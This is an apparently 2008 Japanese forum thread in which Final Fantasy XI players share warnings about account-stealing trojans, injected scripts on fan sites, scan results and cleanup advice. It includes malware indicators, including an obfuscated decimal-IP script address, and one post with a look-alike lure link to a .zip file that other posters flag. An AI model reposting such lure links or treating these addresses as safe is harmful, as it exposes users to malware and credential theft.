●● FF11垢ハック巻き戻し状況報告スレ ●●
http://changi.2ch.net/test/read.cgi/ogame/1216987350/

311 名前:既にその名前は使われています:2008/08/08(金) 14:05:48 ID:XeQNmm4F
>>309
封筒:なんでも良い
切手代:普通の封筒(定形郵便物)なら80円

定形郵便物:14x9cm〜23.5x12x1cm、〜50g

312 名前:既にその名前は使われています:2008/08/08(金) 14:07:46 ID:XeQNmm4F
>>311
×〜50g
○〜25g

25〜50gは90円だった

313 名前:既にその名前は使われています:2008/08/08(金) 14:10:07 ID:YI+ZRcZP
>>309
封筒は中身が透けて見えなければよし。
定型のサイズと料金は>>311-312で書いてくれてるけど、わからなければ
封をした封筒を郵便局の窓口に持っていけば料金教えてくれるよ。

314 名前:292:2008/08/08(金) 14:38:23 ID:ZQwVnqzb
>>264 >>284
ttp://www.virustotal.com/analisis/db032cb7aed741937c6b5c04cfd179ff
今回はバスターのフィリピン解析チームががんばった(返事が早かった)。

315 名前:既にその名前は使われています:2008/08/08(金) 14:53:10 ID:tzMX0IhN
保守

よくわからんが貼って置く
ttp://www.mcafee.com/japan/security/virPQ.asp?v=PWS-Gamania.gen.a!712200C7

316 名前:既にその名前は使われています:2008/08/08(金) 14:59:01 ID:iwPxjcrQ
夏休み前にセキュリティ対策の確認を、IPAが呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20526.html

MS、8月13日公開の月例パッチは“緊急”7件、“重要”5件
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20530.html

317 名前:既にその名前は使われています:2008/08/08(金) 16:13:30 ID:cL25FzLo
200近いから啓蒙ageしとく

318 名前:既にその名前は使われています:2008/08/08(金) 16:48:47 ID:6vLqLZqY
>>315のサイトにある
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ Advanced\Folder\Hidden\SHOWALL CheckedValue

が存在するんだけどヤバイのかね?

319 名前:既にその名前は使われています:2008/08/08(金) 16:52:41 ID:fANkOQNj
>>318
パス抜かれたにゃ

320 名前:既にその名前は使われています:2008/08/08(金) 16:56:51 ID:cL25FzLo
>>318
とりあえず怖いならウイルススキャンしておいで。
けど、記事を読むに該当部分のレジストリが「改変される」ってことだから
あるだけなら問題ないんじゃないのかね。今見てきたけど俺もあるし

321 名前:既にその名前は使われています:2008/08/08(金) 17:23:54 ID:F774PLy4
>>208 >>272 FF11WARNING続き
帰宅したら サーバが復帰してたので(いつまで持つか不明w)
FTPも回復したのでトップと 404ページに移転告知を入れました。
これで同じ形の復旧の見通しが立ちました。
急な移転でご迷惑おかけしますがよろしくお願いいたします。

322 名前:既にその名前は使われています:2008/08/08(金) 17:30:12 ID:F6GqLKES
>>318
それはAdvancedの前に半角スペースが入った偽のキーだ。
半角スペースが無いやつは元々存在するキー。

323 名前:既にその名前は使われています:2008/08/08(金) 17:38:09 ID:WIv3FjaX
ちょっと調べ物してたら
biog11.cf2のサイトをひらいしてしまった・・・。
カスペが起動中だったけどなにも警告してないがスキャンしてみるよ・・・

324 名前:既にその名前は使われています:2008/08/08(金) 17:41:42 ID:cL25FzLo
>>323
blogじゃなくてbiogで
fc2じゃなくてcf2かw

325 名前:既にその名前は使われています:2008/08/08(金) 17:47:03 ID:WIv3FjaX
blog11.fc2だった(´・ω・`)
窓化してたのでパス抜かれたかなぁ・・・

326 名前:既にその名前は使われています:2008/08/08(金) 17:53:00 ID:ZQwVnqzb
おいおいFC2ブログが全部危ないと思ってんの?
その騒動は春先のことで今はほぼ絶滅してるぞ。

327 名前:既にその名前は使われています:2008/08/08(金) 17:54:44 ID:cL25FzLo
>>325
fc2=アウトと決め付けるあたりで認識がずいぶん遅れているとお見受けする。
今は広告枠を買い取ってスクリプトを仕込まれていたり、一般ページでも改竄されて
スクリプトを読み込むようにされているのが主流だよ。もちろんfc2で依然危ないところもあるだろうけど。
もしfc2で感染したとしたらウイルススキャンして出てくる類のものだと思う。早くスキャンしる。
そしてとりあえずFF以外でもPCを使う限りはもう少しFFのハック関連について勉強したほうがいいかもしれない

328 名前:既にその名前は使われています:2008/08/08(金) 17:59:28 ID:WIv3FjaX
>>327
そうなのかー。
んー広告枠云々の話は知ってるがここ見る限りだとfc2はなるべく見ないが鉄則だからさ。
それと先週リアフレが目の前で垢ハックされた現場みたのでちょっと神経質になってたのもあるかもしれん(´・ω・`)

329 名前:既にその名前は使われています:2008/08/08(金) 18:27:06 ID:hnpRuHsS
既出かなあ?

『Firefox』に新たな脆弱性? (インターネットコム)
ttp://news.www.infoseek.co.jp/topics/comp/n_firefox__20080808_2/story/07internetcomwe12/
詳細はまだ明らかでないが、攻撃を受けた PC のハードディスクに保存されている
任意のデータを盗まれる恐れがあるという。Radware のセキュリティ研究者 Itzik Kotler 氏は、
セキュリティ関連カンファレンス『Black Hat』で脆弱性を実証するとしている。

330 名前:既にその名前は使われています:2008/08/08(金) 18:30:02 ID:9gttaPc5
POL起動時にエラーがでる症状ってどんなん?
今POLインしたら通信エラーでてやりなおしたら入れたんだがこれはたまたまだよな・・・

331 名前:既にその名前は使われています:2008/08/08(金) 18:35:27 ID:cL25FzLo
他に>>12の症状であてはまるものはない?
端的な話だけ聞くと割とアウアウに近いよ

332 名前:既にその名前は使われています:2008/08/08(金) 18:42:41 ID:9gttaPc5
一応他の症状には該当しなかった
POLがたまたま重かっただけと思いたいが・・・

333 名前:既にその名前は使われています:2008/08/08(金) 19:29:43 ID:EJkan9mG
>>332
とりあえず例の症状がなんで起こるかはそれぞれ原因が違うよん

>1:Windows Updateがフリーズする。
これはトロイがWindowsUpdateの正規プロセスになりすますため。
>3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
>4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
>5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。
このあたりもWindowsの正規プロセスへのなりすましが原因だろうね。
でもって
>2:POLを起動するとエラーが出る(2回目からは正常に起動)
こいつはトロイがPOLのクライアントに干渉するから。
つまり、Windowsのプロセスへのなりすまし以外の潜伏手段を持っていて、かつPOLへの干渉を行うタイプなら、2の症状だけが出るって可能性も充分ある。

信onで猛威を振るってるKernaeghDrv.dllの感染兆候は「頻繁にクラ落ちする」くらいしか無かったような気がするし、
一回スキャンしてみるのがいいかもねん

334 名前:既にその名前は使われています:2008/08/08(金) 19:32:18 ID:6qmxvkG+
クラ落ちってなんだ

335 名前:既にその名前は使われています:2008/08/08(金) 19:34:04 ID:W0MZnMot
>>330
@起動直前に小窓でエラー報告
AそのままPOL全画面andパス入力画面
Bパス打ち込んで認証画面になったら強制終了
C@のエラー報告窓がでてる
D再度POL立ち上げ。この時はエラー報告でないでそのままログイン可

確かこんな感じ

336 名前:既にその名前は使われています:2008/08/08(金) 19:43:03 ID:EJkan9mG
>>334
クライアント落ちのことでっす
クライアントソフト(FFならPOL・FFXI、信onなら信on本体)が異常終了することでするよ

337 名前:292:2008/08/08(金) 19:47:11 ID:ZQwVnqzb
信onとかで話題になってたkarnaeghdrv.dllもこいつだったみたい。
Sophosより返答。
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojkeylogkl.html
roj/KeyLog-KL drops <System>\karnaeghdrv.dll which is also detected as Troj/KeyLog-KL.

338 名前:既にその名前は使われています:2008/08/08(金) 19:51:22 ID:9gttaPc5
Avastで全域スキャンしたらラグナロクオンラインのフォルダからWin32:Trojan-gen{other}が検出されたんだけど誤検出だよなコレ

339 名前:既にその名前は使われています:2008/08/08(金) 19:52:33 ID:ZQwVnqzb
誤検知じゃね? VirusTotalに投げてみたら?
続きはLiveROのスレでやってくれ。

340 名前:325:2008/08/08(金) 20:20:51 ID:WIv3FjaX
カスペで完全スキャンしたら1つ発見された・・・。
files\live2ch\log\anime3.2ch.net\ranime\1161951707.dat

上のなんだけどねぇ。
一応削除したがちょっとショック(´・ω・`)

341 名前:既にその名前は使われています:2008/08/08(金) 20:22:50 ID:cL25FzLo
>>340
どうみても専ブラのログです

342 名前:既にその名前は使われています:2008/08/08(金) 20:23:55 ID:6qmxvkG+
ばかすぎワロタ

343 名前:既にその名前は使われています:2008/08/08(金) 20:32:50 ID:WIv3FjaX
>>341
それぐらいわかってるけどさw
誤検知でいいのかな?普通に考えればそーなんだがさ。

344 名前:既にその名前は使われています:2008/08/08(金) 20:37:38 ID:27nY5vHv
ワロスwwwwwwwwwwwww

345 名前:既にその名前は使われています:2008/08/08(金) 20:42:27 ID:cL25FzLo
ごめんねdat番号で何のスレかまで調べてごめんね

あんみつ姫

で、一応そのスレざっと覗いてきたけど、19にウイルスコードが貼られてるだけですね
ノートンを誤作動させるやつだと思う

346 名前:既にその名前は使われています:2008/08/08(金) 20:54:09 ID:h56cXdZu
一度垢ハックされたからウイルスソフトでスキャンしたら
ワームとトロイの木馬が検出されたんだけど
駆除したらFFXIにもう影響ないかな…

それとももっとほかに気をつけないといけないウイルスってある?
俺のは、カスタムPCでリカバリソフトが付いてなくて初期化ができないから
どうにかしてウイルスを取り除きたいんだけど…

やっぱり新しいPC買わなくちゃ駄目なのかな?;

347 名前:既にその名前は使われています:2008/08/08(金) 21:05:12 ID:cL25FzLo
>>346
もちろん新しいPCを導入したとしても対策を施さないと無意味どすえ。
あと、そのレスだけではどのウイルスに感染したか分からないしどのソフトで駆除したかも分からないから
「駆除したんだから大丈夫だね^^」と言うことはできない。
基本的にウイルス駆除に責任と自信をもてない人はクリーンインスコを推奨される。
346の場合は新PCかなぁ。自作や組み立てができるなら安く買えるよ。

一旦盗難被害にあった家で、壊された鍵や窓は修理したけど、まだどこかに泥棒が次に入るための
手引きに使うために残したものがあるかもしれない。箪笥や引き出しを引っ掻き回されたままかもしれない。
みたいな状況だからね。まっさらの家に引っ越すか、一旦徹底的に内装を引っぺがして最初から部屋を作り変える
ことをお勧めしたいわけだ

348 名前:既にその名前は使われています:2008/08/08(金) 21:23:14 ID:h56cXdZu
>>347
そうなのか〜…

俺はカスタムPCには詳しくないから
新しく買うとなったら結構かかっちまうけど;
安心してFFするには、やっぱり買い換えるほうがいいんだな

ウイルスの種類はいますぐには分からないけど
分かったときにまた報告にきますm(_ _)m
どうもありがとう

349 名前:既にその名前は使われています:2008/08/08(金) 21:46:11 ID:hisDtxI0
それくらいわかってるふふん

350 名前:既にその名前は使われています:2008/08/08(金) 22:03:10 ID:FgINz74r
竹本泉のあんみつ姫完全版を買ったばかりの俺が何故かPOP

351 名前:既にその名前は使われています:2008/08/08(金) 22:05:22 ID:fC70tzdG
あんみつ姫懐かしすぎ。
葬式と座布団、そして押し入れに葬式まんじゅうを思い出すな。

352 名前:既にその名前は使われています:2008/08/08(金) 22:10:29 ID:nzBGQ2yp
竹本版はオリジナルとは違う独自の設定だぜ
完全版なんて出てたのか

353 名前:既にその名前は使われています:2008/08/08(金) 22:55:15 ID:FgINz74r
完全版はカバー書き下ろしとカラーページの再録、あとがき2ページ追加かな。

講談社版はあとがき自体無かったけど、
宙出版版のあとがきは残ってるので、あとがき好きにはたまりません。

引き続き垢ハックにご注意をの話題再開
↓↓↓↓↓↓↓↓↓↓

354 名前:既にその名前は使われています:2008/08/09(土) 00:08:00 ID:vYdvifQl
>>346 カスタムPCだからリカバリがないって
赤っぽいきらきらしたwindowsって言うOSのディスクはないのか?
マザボのドライバディスクはないのか?
割れとかテスト用ってOSそのまま使ってたのか?
>>309にも驚いたけど こんなん相手にしてたサポセンに同情したくなる。

355 名前:既にその名前は使われています:2008/08/09(土) 00:13:11 ID:91TUl4XL
>>346
ウィンドーズだけ購入する事も可能。ただし、アップグレードを購入すると
前のディスクが無いので困った事になるから正規品を買うしか無い。
一応OMEバージョンとかに良くあるi386フォルダがHDにあるなら
それからディスクを作る事も可能。ただし素人にはおすすめできない。
クリーンインストールする場合はハード関係のドライバ類もきっちりメモしておくこと。
これだけの手間を考えると素直にPS2か新しいPC買ったほうが楽
かもしれない。

356 名前:既にその名前は使われています:2008/08/09(土) 00:17:54 ID:91TUl4XL
>>354
最近のPCは安くしてるのでリカバリーディスクは別途注文
しないといけない。特に○ELLは数年前からリカバリーは
ハードディスクの別のパーティションに入れてあって、
購入後にハードディスク全部をバックアップしろと言ってる。

357 名前:既にその名前は使われています:2008/08/09(土) 00:20:10 ID:M5O/nIrB
最近のはリカバリ領域だけで、メディアは自分で作成or有料で購入になってるな。

358 名前:既にその名前は使われています:2008/08/09(土) 00:29:57 ID:GVH6oeQR
PG2機能してるか確かめたくて
Wikipediaみてみたんだけど普通に見れた

wikipediaって韓国にサーバーあるんじゃなかったっけ?
PG2が特に反応無しで開けてしまってびっくらこいたw

359 名前:既にその名前は使われています:2008/08/09(土) 00:31:05 ID:SWZ6C4bE
>>358
米国鯖にお引越ししました
確認したいならYahooChinaとかに飛んでみ

360 名前:既にその名前は使われています:2008/08/09(土) 00:31:23 ID:MQSXsGHk
>>358
過去スレぐらい嫁

361 名前:既にその名前は使われています:2008/08/09(土) 00:49:15 ID:I+oAOFKS
FF11・マップガイドっていう地図サイトを開こうとしたら画面真っ白で
ん?って感じですぐにはピンときませんでしたが案の定PG2が点滅。
サイトじたいは少しあとで開けましたがPG2のログには送信を61.238.148.112.88で
遮断してました。

過去レスで同じIPの話が出てましたけど、改竄攻撃再来でしょうか・・・

362 名前:既にその名前は使われています:2008/08/09(土) 00:52:35 ID:SBVfiTnC
ねっとべんりのとこだっけ?
トップから行ったら中身がなかったことはあるけど
地図に直にいったら普通に見られたんだよねぇ、何だったんだろうあれ

363 名前:既にその名前は使われています:2008/08/09(土) 00:53:45 ID:SWZ6C4bE
>>361
>>284にあるウイルス置き場だな。
マップガイドのアドレスは正しかった?どこかのリンクから辿ったとかではないのなら
マップガイドのサイトもしくは広告枠あたりが改竄されてることになるね
あとブロックしてるから平気だろうけど一応スキャンかけておきなされ

364 名前:361:2008/08/09(土) 01:03:17 ID:I+oAOFKS
えっと、最初に見たときはIEででした。
いまFireFox+no scriptでしっかりありますね・・・「1039045744:88」が。
ソースを表示してみましたら一番下のほうにscriptで1039045744:88が埋め込まれてます。

うちのはサブPCでカスペ常駐でしたが無反応でした。
現在スキャン中ですけど何も出無そうな感じ。

365 名前:既にその名前は使われています:2008/08/09(土) 01:07:57 ID:86PTnna6
あそこはドメイン名は違うけどXREAだな。最近広告以外も改竄攻撃受けたとかなんとか。
だれか管理人にメールだしておいてくれー
俺はもうPC電源落としちまった

366 名前:既にその名前は使われています:2008/08/09(土) 02:03:40 ID:uJsBTqre
天安門虐殺業者のオリンピック開会式age


取材中にじんみんかいほうぐんwから暴行受けたカメラマンと記者は全治1ヶ月の重症だそうです。

367 名前:既にその名前は使われています:2008/08/09(土) 02:04:23 ID:6Om69Iqv
連絡先わかんねwwww

368 名前:既にその名前は使われています:2008/08/09(土) 02:05:09 ID:WKVNyc07
おいおい
HD交換して、カスペ入れてPG2入れてこれからFF復帰だぁー
って思ったら、FFのプレイボタンクリックしたとたんにカスペ反応;
キーロガーを検知しましたとか出た・・・

もーなんだよこりゃ


369 名前:既にその名前は使われています:2008/08/09(土) 02:45:00 ID:WKVNyc07
>>368だけど、原因がわからないなぁ
プロアクティブディフェンスのイベント見ると、pol.exeにちょっかいだしてるみたいで
処理内容はキーロガーを検知しました、プロセスはキーボード入力の出力先を変更しようと
していますとか書いてあるんだけれども・・・
プレイヤーの皆様へからゲームに切り替わるタイミングで必ず警告が出る。

誰か詳しい人いますか?


370 名前:既にその名前は使われています:2008/08/09(土) 02:47:12 ID:q1Pi0+7+
バックアップファイルに紛れ込んでたんじゃないの
どうせpolフォルダ丸ごとバックアップとかしてたんでしょ

371 名前:既にその名前は使われています:2008/08/09(土) 02:55:47 ID:WKVNyc07
>>370
いや、全部はじめからですね。
まっさらからやり直したんで。
何も持って来てないね。

うーんわからんw


372 名前:既にその名前は使われています:2008/08/09(土) 03:10:12 ID:CWs00r68
ぶっちゃけると、キーロガーチェックしてるなら反応しないやつはいない

キーロガーがなんでもかんでも悪ってわけじゃないからな

373 名前:既にその名前は使われています:2008/08/09(土) 03:42:00 ID:zznGrXD7
FF便利ガイドの方も1039045744:88のスクリプトがあるな

どこに張ってるんだこれ

374 名前:既にその名前は使われています:2008/08/09(土) 03:43:54 ID:WKVNyc07
>>372
うーむ・・・じゃあ大丈夫なんかなぁ
プロアクティブディフェンスの設定キツ過ぎるのかな。


375 名前:既にその名前は使われています:2008/08/09(土) 08:09:58 ID:4CsqG5pP
>>374
インターネットへの物理的接続をしたまま無印XPインストールしちゃったとか?

>>372
悪じゃないキーロガーって言うと何?どんなの?
ID:WKVNyc07がナンか便利なツールを使っていてそれが引っかかるって事?

376 名前:既にその名前は使われています:2008/08/09(土) 08:46:43 ID:vYdvifQl
>>373
フッターのテーブルの中
<TR>
<TD colspan="5" bgcolor="#d5ffd5" align="left" height="20" class="waku0"> 当ホームページに記載されている会社名・製品名・システム名などは、各社の登録商標、もしくは商標です。 Copyright
(C) 2002-2008 SQUARE ENIX CO., LTD. All Rights
Reserved.</TD>【ここにスクリプトへのリンク】
</TR>
</td>と</tr>の間なんて どやったら・・
吟遊詩人さんとこは メニューとヘッダにテーブルないしなぁ。 サーバもs41と s112
フラッシュ広告が悪さしただけじゃなくて htmlソースに影響を与えたってことなんだろうか


377 名前:既にその名前は使われています:2008/08/09(土) 10:08:28 ID:SWZ6C4bE
fc2のときみたいに見つけ次第リストにしとく?
管理人への通報の有無と一緒に

378 名前:既にその名前は使われています:2008/08/09(土) 10:31:23 ID:SWZ6C4bE
あと自分でソース確認できる方法も一応書いとくよ。
昔はアドレス欄のview-sourceで開けたんだけど、SP2以降?は駄目になったはず。

テキストエディタ(何でもいいと思うけど俺はTeraPad)で「ファイルを開く」を選択

ファイル名の欄にチェックしたいページのURL

他にもオンラインで似たようなことをやってくれるサイトもある。けどXREAだから紹介はしない

379 名前:既にその名前は使われています:2008/08/09(土) 10:39:42 ID:g6Cz8mCn
>>375
便利じゃないがRPG2000RTPとか

380 名前:既にその名前は使われています:2008/08/09(土) 11:03:32 ID:dM/nDh/w
http://ff11.s101.xrea.com/index.php

ここもやられてる。
お盆狙って他にもたくさんある予感。


381 名前:既にその名前は使われています:2008/08/09(土) 11:05:05 ID:WhlJUUoI
業者乙


382 名前:既にその名前は使われています:2008/08/09(土) 11:36:41 ID:4Pth7jtr
直リンすんな

業者乙

383 名前:既にその名前は使われています:2008/08/09(土) 11:42:07 ID:y0+kSCLP
FF専用機のPC導入でボーナスの俺の遊ぶ分が
無くなってしまった
俺って経済力ヨエー




384 名前:既にその名前は使われています:2008/08/09(土) 11:42:25 ID:S80d16m3
>>380
アイス買ってきて

385 名前:既にその名前は使われています:2008/08/09(土) 11:42:56 ID:lpAsvZ+t
FF専用機って・・・5万もあればたりないか?かわいそす

386 名前:既にその名前は使われています:2008/08/09(土) 11:43:21 ID:fT2xhvuH
POL起動してFF選択して「プレイ」押したら
青い画面の「同意する」とか選ぶ場面あるよね
その画面にいくとエラーでて強制終了させられるんだが、これ垢ハックと関係あるんかな…

ファイルチェックしてもなんにもでないんですが。
落されてまたPOLインしてプレイ押すと同じ感じで落とされて
20分くらい報知するとインできるようになる

387 名前:既にその名前は使われています:2008/08/09(土) 11:49:50 ID:gssHA1xc
登録情報なんかの本人しかわからい情報を、もー少し生かせられないかなぁ
パス変更するときに、すこし煩雑になってしまうかだけもだけど、それを入れてからじゃないと出来ない とか
もしプレイ中にPOLにログインされて落とされても、業者側はパスを変更することは出来ないから
もっかいログインしなおして、新たにパスを変更することも可能になるし、POLは後から入った方が有利ってのもプラスになる
まぁそれだと業者がログインしてる状態で繋いだ時に、こちらも気づかないかもしれないから
すでにログインされている状態で繋ごうとしたら、「すでにログインしていますが〜」とか警告が出れば良いんだしさ


388 名前:既にその名前は使われています:2008/08/09(土) 11:56:31 ID:sGEMIZOz
「+ + 激しく忍者スレテンプレ + +」もメニューが改竄されてjp.jsを開くようになってる。

389 名前:既にその名前は使われています:2008/08/09(土) 12:04:00 ID:vYdvifQl
XREA 1039045744:88 の確認されたサイト

吟遊詩人テンプレ:メニュー ヘッダー 対策済み
FF11・マップガイド(ネット便利)フッターテーブル内 
黒魔協会:xml宣言の前
忍者スレテンプレ:メニュー </body>と</html>の間

390 名前:既にその名前は使われています:2008/08/09(土) 12:06:42 ID:86PTnna6
>>386
それはどっちかというと全画面モードかんけいじゃないかな
他に全画面モードで開いてるゲームとかない?
公式窓化だと窓モードにしてても他のアプリを全画面にしようとすると強制的に落ちるよ。
で、POLだけは平気なんだけどその「同意する」以降が他の全画面がアウトのはず。
ツクールのゲームとか古めの東方とかと並行できなくて結構不便

391 名前:既にその名前は使われています:2008/08/09(土) 12:23:03 ID:dM/nDh/w
直リンはまずかったね。申し訳ない。

392 名前:既にその名前は使われています:2008/08/09(土) 12:29:01 ID:AS/+arXS
なんか広告の件といい、XREAやばいんちゃうか?

>>373
netbenriはs137.xrea.comね。

393 名前:既にその名前は使われています:2008/08/09(土) 12:42:30 ID:WhlJUUoI
警告のつもりでも直リンは即NG
異論、反論は認めない

394 名前:既にその名前は使われています:2008/08/09(土) 12:53:06 ID:AS/+arXS
>>386
マザボやビデオカードが熱とかでイカレてんじゃね?

395 名前:既にその名前は使われています:2008/08/09(土) 12:53:09 ID:DVrzeDyX
ギコナビとJaneでURLをリンク化させない方法はある?

396 名前:既にその名前は使われています:2008/08/09(土) 12:53:42 ID:NdNDJNBT
いまいちしくみがよくわかんない素人なんですけど
ウイルスソフト無くても
ウィンドウズアップデートとか
javaとかflashとか最新にしてたら
実行ボタンを自分で押さない限り
FFの今のアカハックのスパイウェアは防げますよね

397 名前:既にその名前は使われています:2008/08/09(土) 12:55:48 ID:g6Cz8mCn
そんなの保証出来ないし別のに引っ掛かるけどな

398 名前:既にその名前は使われています:2008/08/09(土) 12:56:05 ID:4CsqG5pP
>>379
ググったらツクールで無料ゲームか。
何故それにキーロガーが必要なのかチと分からんが
何だかんだでやっぱり貧乏(性)なのが起因なんだな。

って、実際ID:WKVNyc07が何やってるのか知らんが。

>>385
五万ならFF11以外専用機にするな、ナンか不安だw
同じ五万ならリムーバブルHDDとそれに乗せるOS、セキュリティソフト、
atokあたり買って使い分けた方が良いかな、俺は。

399 名前:既にその名前は使われています:2008/08/09(土) 12:56:19 ID:u6Fwnsea
ふせげねーよボケ;;

400 名前:既にその名前は使われています:2008/08/09(土) 13:02:05 ID:AS/+arXS
>>396
バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン2.00リリース
バージョン1.00の穴を使ったウイルスが出る

という順ならそうなんだけど

バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン1.00の穴を使ったウイルスが出る ←今ここ
バージョン2.00リリースにご期待ください!

となったらどうしようもありません(ゼロデイ)。

401 名前:既にその名前は使われています:2008/08/09(土) 13:12:35 ID:upYVR4fp
>>396
「ウイルスソフト無くても」
金出さなくてもチェックする方法はいくらでもある。
「最新にしてたら」
そういうヤツ程ツールが古い。
「実行ボタンを自分で押さない限り」
ハックする方だって馬鹿じゃない。
「防げますよね」
それが一番危険な考え方。

402 名前:既にその名前は使われています:2008/08/09(土) 13:14:57 ID:rpgB/WsJ
>>396
自分も素人だけどセキュリティソフト位は入れてるなぁ。
あと素人だから分からないんだけど実行ボタンて何だろう。

403 名前:既にその名前は使われています:2008/08/09(土) 13:26:02 ID:AS/+arXS
うーん…。
>>389 を一通り見てきたけど、これはジョブ戦術板をぱっと見て
テンプレサイトがXREAならはい書き換え〜みたいに
XREA上のサイトなら自由に書き換えられる気がするな、この犯人。
広告改竄の時も「こいつ…デキる(キリッ」とか思ったけど、まずいよこれ。

# なんかアクセスがいっぱいあると思ったら詩人テンプレからいっぱい来てた(;^ω^)

404 名前:既にその名前は使われています:2008/08/09(土) 13:26:22 ID:f8OpFh7o
無料有料問わず何もセキュリティーソフトを入れていないことに驚き

405 名前:既にその名前は使われています:2008/08/09(土) 13:28:02 ID:bIfNZ9Ef
>>374
何スレ前かもう覚えてないけど、
キーロガーの検知有効にしたらpolでキーロガー検知したけど、信頼リストに入れて大丈夫だよね?
と質問したら問題ないとレス返されたので、そのまま信頼リストに入れて今現在まで問題なくプレイできてる。
カスペが本当にキーロガー検知してるのか、勘違いなのかはわからないw

406 名前:既にその名前は使われています:2008/08/09(土) 13:29:00 ID:vYdvifQl
>>396 煽り?w
そんなんで防げるなら このスレがパート35までくるわけないじゃんw
しかもハックの手段はどんどん変わるから 点や線じゃなくて面で予防するためにここで情報共有してるの
だから 自分で大丈夫と思うならわざわざここで聞く必要はないよ。
誰かに大丈夫って言って欲しいのか?そんでいざハックされたら ここで大丈夫って言われたとでも言うのか?

407 名前:既にその名前は使われています:2008/08/09(土) 13:31:00 ID:AS/+arXS
あとジョブ板の該当ジョブスレで警告発してくれた人ありがとう。
そこまで気が回らなかった。

408 名前:既にその名前は使われています:2008/08/09(土) 13:51:34 ID:AS/+arXS
XREAのあれ、昨夜トロイが更新。
新型はNorton検知・バスター脱落(旧型は逆)。
ttp://www.virustotal.com/analisis/71ffc7eb2711f142889fcf9348212e17
まだ反映されていないけど、AntiVirは「TR/Drop.OnLineGa.35」あるいは
「TR/PSW.OnlineGa.eaa」で撃破予定と返答あり。

409 名前:既にその名前は使われています:2008/08/09(土) 13:53:59 ID:767RmAvt
avastやめてカスペに乗り換えようとしたとき
カスペがキーロガーがどうのレジストリがどうのと聞いてきて
対処不明だったうえにPOLのウィンドウがバグってしまったよ
んで一日前にシステム復元したらPOLは元通り
当日に復元したらやっぱバグる
ってのを繰り返してたらシステムが壊れたw
だからどうしたといわれても困るが

410 名前:既にその名前は使われています:2008/08/09(土) 13:55:11 ID:AS/+arXS
システムの復元はMe以来信用してないw

411 名前:既にその名前は使われています:2008/08/09(土) 14:28:04 ID:WhlJUUoI
システムの復元はおばちゃんの厚化粧と同じ
厚く塗ったり落としたり繰り返して遠目にはそれなりに見えるが・・・

412 名前:既にその名前は使われています:2008/08/09(土) 14:46:52 ID:vYdvifQl
ミュモルブログさんが来てたのか
解析いつも乙&あざーっす。
パターンファイル名から見ると flash広告のときの(orz.exeになるヤツ)と同一だったのが
夜の間に生まれ変わったってことすかね。
汚染ルートが また広告鯖がらみなのか 鯖そのものなのか
ピンポイントなのか 気になって眠れないw

413 名前:既にその名前は使われています:2008/08/09(土) 14:49:27 ID:8bc5sT3i
素人を自称するならなおさらアンチウイルスソフトいれておけ
んなもんをケチるな

414 名前:既にその名前は使われています:2008/08/09(土) 14:52:13 ID:SWZ6C4bE
>>412
ミュモルブログwwwwww
いつもの人も注意喚起班の人もおつー。
改竄部位を見るにそれぞれ違う場所っぽいし、XREAにあるFF関連をピンポイントで狙ってるんじゃないかな。
XREAのサーバーにイタズラする技術なら既に持ち合わせてそうだしね。
ソース調べようとして間違えてクリックしてページ開いた俺涙目

415 名前:既にその名前は使われています:2008/08/09(土) 14:57:24 ID:SWZ6C4bE
それと、垢ハックスレを見ない人にも目を留めてもらうために、
もう少し改竄ページとかがはっきりしたらまた別スレ建てたほうがいいかもしれんね

あと、1039045744をぐぐっても注意喚起のページばっかり出るんだけど、
bodyタグあたりにしこんだタグはロボット検索に引っかからないとかある?
もしかしたらそういう意図で特定の部位に仕込んでたりするのかな?

416 名前:既にその名前は使われています:2008/08/09(土) 15:29:51 ID:W8h0gMNp
http://www.pleyonline.com/homee/news139423.shtml.zip
皆様に重要なお知らせ


417 名前:既にその名前は使われています:2008/08/09(土) 15:31:57 ID:SegjDfFs
^^;

418 名前:既にその名前は使われています:2008/08/09(土) 15:32:30 ID:SWZ6C4bE
>>416
はいはいzipzip
●●注意:416はウイルスです●●

419 名前:既にその名前は使われています:2008/08/09(土) 15:36:35 ID:jg9R2RDj
こんなんでも踏む奴いそうだな・・・

420 名前:既にその名前は使われています:2008/08/09(土) 15:49:02 ID:M5O/nIrB
このスレに張っても検体提出してるようなものなのにな。

421 名前:既にその名前は使われています:2008/08/09(土) 15:50:38 ID:WhlJUUoI
>>416
ふむなよ!


422 名前:既にその名前は使われています:2008/08/09(土) 15:52:20 ID:ApaqC/qE

業者さんも毎日のノルマ大変っすね^^;;;

423 名前:既にその名前は使われています:2008/08/09(土) 15:58:14 ID:S80d16m3
感染したい人は踏めばいい

424 名前:既にその名前は使われています:2008/08/09(土) 16:40:27 ID:uGhrjCDj
wgetしてみたが普通にhtmlソースだな。
面倒だから中見てないけど踏まないに越したことは無い。

425 名前:既にその名前は使われています:2008/08/09(土) 16:57:55 ID:W8h0gMNp
ただの注意喚起です^^;
存在しないからhttp://www.pleyonline.com/に飛びますw

426 名前:既にその名前は使われています:2008/08/09(土) 16:58:19 ID:WKVNyc07
>>375
374ですが、ネットに繋いだのはXPインスコ後カスペ導入時とXPアップデート時
のみで、PG2とかは他PCで落としたのを移動して来たのをインスコしたので、
本当にWEB閲覧とかは無しですね。
あとツールとかなんですかそれ?って感じなんですが・・・
そういう知識全く無いので使うはずも無い訳でw

>>405
情報有難う御座います。
なんか他の所色々と見てたら、どうもカスペのキーロガーの検知にチェック入れてると
反応するってのは書かれてました。
どうもそういう使用みたいですね。

ということなら・・・大丈夫なんですかね


427 名前:既にその名前は使われています:2008/08/09(土) 17:02:02 ID:SWZ6C4bE
>>425
PL『E』YONLINE
●●425は偽URLです●●

428 名前:既にその名前は使われています:2008/08/09(土) 17:02:17 ID:D/9nYSfi
>>425
pleyになっちゃってるぞ^^

429 名前:既にその名前は使われています:2008/08/09(土) 17:03:34 ID:D/9nYSfi
罠サイト誘導しようとしてる奴ってまじで業者?
JPの糞がやってんなら通報したら逮捕じゃね?w

430 名前:既にその名前は使われています:2008/08/09(土) 17:12:39 ID:3zbSgyla
>>375
どんなの?も何もPOL.EXE自体が悪じゃないキーロガーだよって話。

